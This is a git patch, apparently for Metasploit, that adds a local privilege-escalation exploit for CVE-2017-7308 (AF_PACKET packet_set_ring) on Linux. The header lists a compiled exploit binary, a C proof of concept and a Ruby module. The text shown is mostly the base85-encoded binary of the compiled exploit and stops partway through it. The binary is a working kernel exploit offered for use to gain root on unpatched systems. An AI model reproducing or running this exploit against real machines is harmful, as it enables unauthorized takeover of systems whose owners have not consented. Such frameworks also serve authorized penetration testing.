From f7504dd9d5943b855bcd48887cd5aaaf41285ebc Mon Sep 17 00:00:00 2001
From: Brendan Coles
Date: Sat, 28 Apr 2018 01:40:17 +0000
Subject: [PATCH 1/6] Add AF_PACKET packet_set_ring Privilege Escalation exploit
---
data/exploits/cve-2017-7308/exploit | Bin 0 -> 72880 bytes
data/exploits/cve-2017-7308/poc.c | 781 ++++++++++++++++++
.../af_packet_packet_set_ring_priv_esc.rb | 196 +++++
3 files changed, 977 insertions(+)
create mode 100644 data/exploits/cve-2017-7308/exploit
create mode 100644 data/exploits/cve-2017-7308/poc.c
create mode 100644 modules/exploits/linux/local/af_packet_packet_set_ring_priv_esc.rb
diff --git a/data/exploits/cve-2017-7308/exploit b/data/exploits/cve-2017-7308/exploit new file mode 100644 index 0000000000000000000000000000000000000000..02813270d85a92dc11784943c1a95449c8f468b3 GIT binary patch literal 72880 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 
